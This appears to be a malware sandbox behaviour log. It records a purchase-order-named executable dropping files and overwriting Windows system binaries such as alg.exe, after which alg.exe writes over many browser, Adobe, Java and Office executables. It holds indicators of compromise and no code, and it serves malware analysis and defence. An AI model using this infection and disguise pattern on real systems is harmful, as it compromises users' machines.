Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	File created: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
